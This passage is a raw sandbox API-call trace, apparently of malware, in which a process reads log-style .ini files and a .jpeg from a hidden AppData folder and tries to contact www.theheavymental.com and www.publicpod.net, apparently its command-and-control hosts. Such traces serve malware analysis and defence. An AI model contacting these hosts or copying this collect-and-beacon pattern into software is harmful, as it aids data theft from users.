ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.043] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0249.043] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.043] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.043] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1364, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0249.043] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.043] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.043] NtQueryInformationFile (in: FileHandle=0x1364, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0249.043] NtReadFile (in: FileHandle=0x1364, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0249.044] NtClose (Handle=0x1364) returned 0x0 [0249.044] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.044] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.045] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.045] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.045] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.045] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.045] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.045] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.045] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.045] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.045] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.045] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.045] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.045] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1364, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0249.045] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.045] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.045] NtQueryInformationFile (in: FileHandle=0x1364, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0249.045] NtReadFile (in: FileHandle=0x1364, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x6ea, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0249.046] NtClose (Handle=0x1364) returned 0x0 [0249.047] getaddrinfo (in: pNodeName="www.theheavymental.com", pServiceName="80", pHints=0x6f0c298*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c2c8 | out: ppResult=0x6f0c2c8*=0x0) returned 11001 [0249.048] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.048] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.048] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.048] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.048] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.048] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1364, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0249.048] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.048] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.048] NtQueryInformationFile (in: FileHandle=0x1364, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0249.048] NtReadFile (in: FileHandle=0x1364, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0249.049] NtClose (Handle=0x1364) returned 0x0 [0249.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.050] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.050] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.050] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.050] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.050] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.050] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.050] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.050] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.050] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0x1364, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0249.050] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0249.050] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.050] NtQueryInformationFile (in: FileHandle=0x1364, IoStatusBlock=0x26ef610, FileInformation=0x26ef620, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef610, FileInformation=0x26ef620) returned 0x0 [0249.050] NtReadFile (in: FileHandle=0x1364, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef610, Buffer=0x8fb984d, BufferLength=0x2ba28, ByteOffset=0x26ef608*=0, Key=0x0 | out: IoStatusBlock=0x26ef610, Buffer=0x8fb984d*) returned 0x0 [0249.052] NtClose (Handle=0x1364) returned 0x0 [0249.052] getaddrinfo (in: pNodeName="www.theheavymental.com", pServiceName="80", pHints=0x6f0c298*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c2c8 | out: ppResult=0x6f0c2c8*=0x0) returned 11001 [0249.053] socket (af=2, type=1, protocol=6) returned 0x1364 [0249.053] getaddrinfo (in: pNodeName="www.publicpod.net", pServiceName="80", pHints=0x6f0c638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c668 | out: ppResult=0x6f0c668*=0x0) returned 11001 [0249.053] Sleep (dwMilliseconds=0x7d0) [0249.057] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.057] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.057] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0249.058] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.058] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x13ac, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0249.058] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.058] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.058] NtQueryInformationFile (in: FileHandle=0x13ac, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0249.058] NtReadFile (in: FileHandle=0x13ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0249.058] NtClose (Handle=0x13ac) returned 0x0 [0249.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.058] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.058] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.058] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.059] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.059] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.059] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.059] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.059] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.059] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.059] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.059] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.059] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x13ac, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0249.059] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.059] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.059] NtQueryInformationFile (in: FileHandle=0x13ac, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0249.059] NtReadFile (in: FileHandle=0x13ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x6ea, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0249.059] NtClose (Handle=0x13ac) returned 0x0 [0249.059] getaddrinfo (in: pNodeName="www.publicpod.net", pServiceName="80", pHints=0x6f0c638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c668 | out: ppResult=0x6f0c668*=0x0) returned 11001 [0249.060] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.060] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.060] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.060] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.060] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.060] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, 